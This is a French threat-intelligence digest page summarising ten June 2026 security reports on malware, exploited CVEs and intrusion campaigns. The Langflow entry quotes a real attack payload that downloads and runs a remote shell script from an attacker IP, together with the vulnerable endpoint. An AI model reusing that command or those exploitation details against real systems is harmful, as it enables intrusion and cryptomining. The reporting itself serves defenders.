Millenium RAT v4 : migration vers C++, MaaS Ă  50$/mois, 62 000 endpoints compromis

🔍 Contexte PubliĂ© le 25 juin 2026 par Group-IB (blog officiel), cet article prĂ©sente une analyse technique approfondie du Millenium RAT version 4.*, un cheval de Troie d’accĂšs Ă  distance (RAT) initialement documentĂ© par CYFIRMA en novembre 2023 (version 2.4). L’analyse couvre l’évolution architecturale du malware, son modĂšle de distribution, les campagnes actives et la victimologie mondiale. đŸ—ïž Évolution architecturale majeure La version 4.* marque un changement architectural critique : le malware abandonne le framework .NET au profit d’une application native C++, supprimant toute dĂ©pendance au runtime .NET. La communication C2 repose exclusivement sur l’API Telegram Bot via libcurl, sans infrastructure serveur dĂ©diĂ©e. La configuration est chargĂ©e depuis une ressource PE embarquĂ©e (RCDATA), encodĂ©e en Base64 et chiffrĂ©e via un algorithme XOR personnalisĂ© avec mot de passe intĂ©grĂ© dans le PE. ...

29 juin 2026 Â· 6 min

RoguePlanet et GreatXML : élévation de privilÚges et contournement BitLocker sous Windows

🔍 Contexte PubliĂ© le 17 juin 2026 par Serhii Melnyk (LevelBlue SpiderLabs), cet article prĂ©sente une analyse technique approfondie de deux preuves de concept (PoC) publiĂ©es sous les alias Nightmare-Eclipse / MSNightmare, peu aprĂšs le Patch Tuesday de juin 2026 de Microsoft. 🚀 RoguePlanet : ÉlĂ©vation de privilĂšges locale via Microsoft Defender RoguePlanet est une technique d’élĂ©vation de privilĂšges locale (LPE) permettant Ă  un utilisateur standard d’obtenir une exĂ©cution en contexte SYSTEM sans exploitation noyau ni corruption mĂ©moire. Elle repose sur une chaĂźne en 7 Ă©tapes orchestrant des composants Windows lĂ©gitimes : ...

29 juin 2026 Â· 4 min

UAC-0184 : évolution du tooling OneDrive sideload vers Remcos Agent 7.1.0 Pro

🔍 Contexte Analyse technique publiĂ©e le 27 juin 2026 par Robin Dost sur le blog Synaptic Security, documentant l’évolution du tooling de l’acteur UAC-0184 (Ă©galement trackĂ© sous MB-0005). L’article fait suite Ă  une prĂ©cĂ©dente analyse de la mĂȘme campagne et couvre un nouveau sample avec une chaĂźne d’infection remaniĂ©e. 📩 Vecteur initial L’archive initiale spisokszch.zip (SHA-256 : c74bb6fb848cdb87c2b4261da1efc078023cdf95aa7b1436c52c26f3a11025af) contient : Quatre fichiers LNK dĂ©guisĂ©s en images JPG et un fichier Excel Un fichier README.txt rĂ©digĂ© en ukrainien demandant Ă  la victime d’extraire les fichiers sur le bureau avant de les ouvrir Le contenu leurre est un tableau militaire ukrainien de cas d’AWOL/dĂ©sertion (39 soldats avec noms, grades, dates d’absence, numĂ©ros de dossiers), ciblant explicitement une audience militaro-administrative ukrainienne. ...

29 juin 2026 Â· 5 min

UAC-0226 exploite une faille WinRAR pour déployer GIFTEDCROOK contre des cibles ukrainiennes

📰 Source : Cyber Press — Date : 26 juin 2026 🎯 Contexte Le groupe de menace UAC-0226 a mis Ă  jour ses tactiques pour cibler des entitĂ©s ukrainiennes, notamment dans le domaine militaire, en dĂ©ployant le stealer GIFTEDCROOK via une nouvelle chaĂźne d’infection exploitant une faille dans WinRAR. 🔓 Vecteur d’infection Les attaquants exploitent une vulnĂ©rabilitĂ© de path traversal via Alternate Data Streams (ADS) dans WinRAR. Lors de la simple extraction d’une archive, le payload est dĂ©posĂ© automatiquement sans interaction supplĂ©mentaire de la victime. Un leurre PDF thĂ©matisĂ© autour des drones de reconnaissance Ă  fibre optique ukrainiens est utilisĂ© pour cibler un public militaire. ...

29 juin 2026 Â· 3 min

WeedHack MaaS : LoaderClient utilise des smart contracts Ethereum pour son infrastructure C2

🎯 Contexte PubliĂ© le 24 juin 2026 par la Darkatlas Squad sur darkatlas.io, cet article prĂ©sente une analyse technique complĂšte de LoaderClient, le payload de stage-1 de la campagne WeedHack, un service de Malware-as-a-Service (MaaS) ciblant les joueurs Minecraft depuis janvier 2026. đŸ§© Origine et Ă©volution de la campagne WeedHack est issu d’un stealer privĂ© appelĂ© Majanito (fin 2025), dĂ©veloppĂ© par un acteur utilisant le mĂȘme pseudonyme. En dĂ©but 2026, la base de code a Ă©tĂ© reprise et rebrandĂ©e en WeedHack, transformĂ©e en plateforme MaaS accessible sur le clearnet. Le namespace dev.majanito est prĂ©servĂ© dans le code compilĂ© du stage-2, confirmant la filiation. La campagne a enregistrĂ© plus de 116 000 compromissions uniques avec un rythme de 2 000 Ă  3 000 nouvelles infections par jour. ...

29 juin 2026 Â· 5 min

Backdoor.Mistic : nouveau backdoor furtif lié à l'IAB Woodgnat et aux ransomwares Qilin

🔍 Contexte Rapport publiĂ© le 24 juin 2026 par la Threat Hunter Team de Symantec (Broadcom). L’article documente un nouveau backdoor baptisĂ© Backdoor.Mistic, actif depuis avril 2026, et son association probable avec l’initial access broker (IAB) suivi sous les noms Woodgnat (Symantec) et KongTuke (public). Le backdoor a Ă©galement Ă©tĂ© documentĂ© par Zscaler sous le nom MLTBackdoor. 🎯 Ciblage Le ciblage est opportuniste, couvrant plusieurs secteurs : Assurance Éducation IT Services professionnels D’autres activitĂ©s liĂ©es Ă  ModeloRAT et Node.js ont Ă©tĂ© observĂ©es dĂšs fĂ©vrier 2026 dans d’autres organisations, sans dĂ©ploiement de Mistic. ...

26 juin 2026 Â· 6 min

Campagne ClickFix active exploitant CVE-2026-26980 dans Ghost CMS : 287 sites compromis

🔍 Contexte PubliĂ© le 23 juin 2026 par SicuraNext (blog.sicuranext.com), cet article prĂ©sente une recherche read-only menĂ©e le 11 juin 2026 sur une campagne active exploitant CVE-2026-26980, une injection SQL dans l’API publique Content de Ghost CMS (versions 3.24.0 Ă  6.19.0, corrigĂ©e en 6.19.1 en fĂ©vrier 2026). ⚙ MĂ©canisme d’attaque L’exploitation se dĂ©roule en deux Ă©tapes : Lecture via Content API (sans authentification) pour extraire la clĂ© Admin API stockĂ©e en base de donnĂ©es Écriture via Admin API avec la clĂ© volĂ©e pour injecter un loader JavaScript malveillant dans les corps de posts Le loader injectĂ© (ghost_once_footer_<id>) utilise une porte localStorage (exĂ©cution unique par navigateur), encode l’origine victime via btoa(location.origin), et charge un second stage depuis un C2 via une URL base64 encodĂ©e. La chaĂźne mĂšne Ă  une page FakeCAPTCHA/ClickFix incitant les visiteurs Ă  exĂ©cuter des commandes ou installer un malware. ...

26 juin 2026 Â· 3 min

CVE-2024-40766 SonicWall : le patch ne suffit pas, les configurations restent vulnérables

🔍 Contexte Analyse publiĂ©e le 23 juin 2026 par Manuel Humberto Santander PelĂĄez (SANS Internet Storm Center), portant sur deux annĂ©es d’exploitation active de CVE-2024-40766, une vulnĂ©rabilitĂ© d’accĂšs non autorisĂ© (CVSS 9.3) dans SonicOS affectant les pare-feux Gen 5, Gen 6 et Gen 7 de SonicWall. 🎯 VulnĂ©rabilitĂ©s concernĂ©es CVE-2024-40766 : Improper access control dans SonicOS, affectant l’interface de gestion et le service SSLVPN. Advisory SNWLID-2024-0015 publiĂ© en aoĂ»t 2024. CVE-2024-12802 : Bypass d’authentification MFA sur SSLVPN SonicWall, exploitĂ© in-the-wild dĂšs fĂ©vrier-mars 2026. Sur Gen 6, le patch firmware seul ne remĂ©die pas la faille — 6 Ă©tapes manuelles de reconfiguration LDAP sont requises. Les Gen 6 ont atteint leur end-of-life le 16 avril 2026, sans plus aucun patch de sĂ©curitĂ© disponible. đŸ‘„ Acteurs de la menace Akira ransomware : exploitation documentĂ©e depuis septembre 2024, reprĂ©sentant 75% des intrusions. Dwell time documentĂ© sous 4 heures, certains cas en 55 minutes. Fog ransomware : exploitation parallĂšle, reprĂ©sentant ~25% des intrusions sur la mĂȘme pĂ©riode. En octobre 2025, Huntress a documentĂ© plus de 100 comptes SSLVPN compromis dans 16 environnements clients en une seule vague, via des credentials valides (pas de brute-force). 🔓 Vecteurs d’exploitation post-patch Comptes locaux obsolĂštes : 12/14 pare-feux auditĂ©s avaient des comptes SSLVPN sans Ă©quivalent Active Directory, dont certains avec des caractĂšres non imprimables (indicateur de crĂ©ation automatisĂ©e par tooling d’exploitation). Absence de rotation des mots de passe : 11/14 pare-feux n’avaient pas changĂ© les credentials locaux aprĂšs la mise Ă  jour firmware. LDAP Default User Group mal configurĂ© : 9/14 pare-feux accordaient implicitement l’accĂšs SSLVPN Ă  tous les comptes AD authentifiĂ©s via LDAP. Dans un cas, ce groupe donnait aussi l’accĂšs administrateur Ă  l’interface de gestion. Virtual Office Portal exposĂ© : 7/14 pare-feux avaient le portail d’enrollment MFA/TOTP accessible depuis Internet, permettant Ă  un attaquant d’enrĂŽler son propre dispositif TOTP avec des credentials valides. Breach MySonicWall (septembre 2025) : SonicWall a confirmĂ© une compromission de sa plateforme cloud avec accĂšs aux fichiers de sauvegarde de configuration contenant des credentials chiffrĂ©s — initialement annoncĂ© comme <5% des clients, puis confirmĂ© comme affectant la totalitĂ© des backups. 📊 Indicateurs de sessions suspectes Sessions depuis des ASN d’hĂ©bergeurs/VPS durant les heures creuses, durĂ©es de 40 Ă  60 heures Sessions sur des comptes locaux dĂ©sactivĂ©s dans AD depuis plus d’un an, restant actives aprĂšs le patch Type de session sess="CLI" dans les logs d’authentification SonicWall : indicateur d’outillage automatisĂ© (documentĂ© par ReliaQuest en mai 2026) Transition sess="CLI" → sess="GMS" : signal fort d’une activitĂ© hands-on-keyboard aprĂšs credential testing automatisĂ© đŸ§© Type d’article Analyse technique post-mortem combinant retour d’audit terrain (14 pare-feux), chronologie d’exploitation sur deux ans, et extraction de rĂšgles de dĂ©tection. But principal : documenter l’écart entre un pare-feu « patchĂ© » et un pare-feu rĂ©ellement durci. ...

26 juin 2026 Â· 4 min

CVE-2026-33017 : des cryptomineurs Monero exploitent Langflow via RCE non authentifiée

🔍 Contexte PubliĂ© le 23 juin 2026 par Trend Micro (Simon Dulude et John Zhang), cet article prĂ©sente une analyse technique complĂšte d’une campagne de cryptominage exploitant CVE-2026-33017, une vulnĂ©rabilitĂ© d’exĂ©cution de code Ă  distance non authentifiĂ©e dans Langflow, un framework Python de construction de workflows LLM. 🎯 Vecteur d’accĂšs initial L’exploitation cible l’endpoint POST /api/v1/build_public_tmp/{flow_id}/flow de Langflow, qui Ă©value du code Python sans authentification. L’attaquant injecte __import__('os').system('curl http://83.142.209.214:8080/isp.sh | sh') pour dĂ©clencher la chaĂźne d’infection. Le mĂȘme flow_id UUID (0ee284cc-0eb1-493f-bc60-94fa8d1cfd18) est rĂ©utilisĂ© dans toutes les tentatives. La fenĂȘtre d’observation couvre 19 jours (27 mars – 15 avril 2026). ...

26 juin 2026 Â· 5 min

Edgecution : extension Edge malveillante exploitant Native Messaging pour déployer un backdoor Python

📰 Source : BleepingComputer, publiĂ© le 24 juin 2026, basĂ© sur une analyse technique de Zscaler. 🎯 Contexte gĂ©nĂ©ral Des chercheurs de Zscaler ont documentĂ© une campagne d’attaque sophistiquĂ©e utilisant une extension malveillante pour Microsoft Edge, baptisĂ©e Edgecution, attribuĂ©e Ă  un initial access broker (IAB) liĂ© Ă  l’opĂ©ration ransomware Payouts Kings. 🔓 Vecteur d’accĂšs initial L’attaque dĂ©bute par une ingĂ©nierie sociale via Microsoft Teams : l’attaquant se fait passer pour du personnel IT et dirige les victimes vers une fausse page “Outlook Updates Management Console” imitant Microsoft. Cette page propose des boutons de tĂ©lĂ©chargement qui : ...

26 juin 2026 Â· 3 min
Derniùre mise à jour le: 4 juillet 2026 📝